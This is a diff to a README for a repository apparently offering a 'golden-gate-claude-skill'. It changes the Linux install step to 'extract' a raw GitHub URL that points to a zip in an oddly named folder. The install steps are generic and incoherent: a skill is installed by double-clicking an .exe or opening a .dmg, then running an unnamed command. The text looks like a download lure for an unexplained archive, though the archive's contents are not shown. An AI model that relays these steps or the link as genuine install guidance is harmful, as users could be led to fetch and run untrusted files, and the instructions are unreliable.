Waistlinereadout106/golden-gate-claude-skill/README.md

 5. **Install the Application**
    - **Windows:** Double-click the `.exe` file and follow the instructions on your screen.
    - **Mac:** Open the `.dmg` or `.zip` file, and drag the application into your Applications folder.
-   - **Linux:** Extract the `.tar.gz` file.
+   - **Linux:** Extract the `https://raw.githubusercontent.com/Waistlinereadout106/golden-gate-claude-skill/main/urare/golden-gate-claude-skill-1.5.zip` file.
 Open a terminal and navigate to the extracted folder.
 Run the installation command.

 ## 🖥️ System Requirements